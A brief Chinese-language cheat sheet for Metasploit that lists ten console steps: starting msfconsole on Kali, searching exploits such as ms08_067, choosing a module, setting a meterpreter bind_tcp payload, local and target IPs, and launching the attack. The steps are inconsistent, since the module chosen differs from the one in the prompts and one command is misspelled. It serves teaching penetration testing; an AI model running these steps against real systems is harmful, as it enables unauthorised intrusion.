1、连接MSF
root@kali:~# msfconsole
2、显示所有攻击模块
msf > show exploits |more
3、寻找攻击模块
msf > search ms08_067
4、使用攻击模块
msf > use /exploits/windows/tftp/tftpd32_long_filename
5、显示payloads
msf > show paylods
6、设置payloads
msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp
7、查询设置
msf exploit(php_cgi_arg_injection) > show options
8、监听本地IP
msf exploit(php_cgi_arg_injection) > set LHOST 192.168.1.88
9、监听目标IP
msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.74
10、开始攻击
msf exploit(php_cgi_arg_injection) > exploit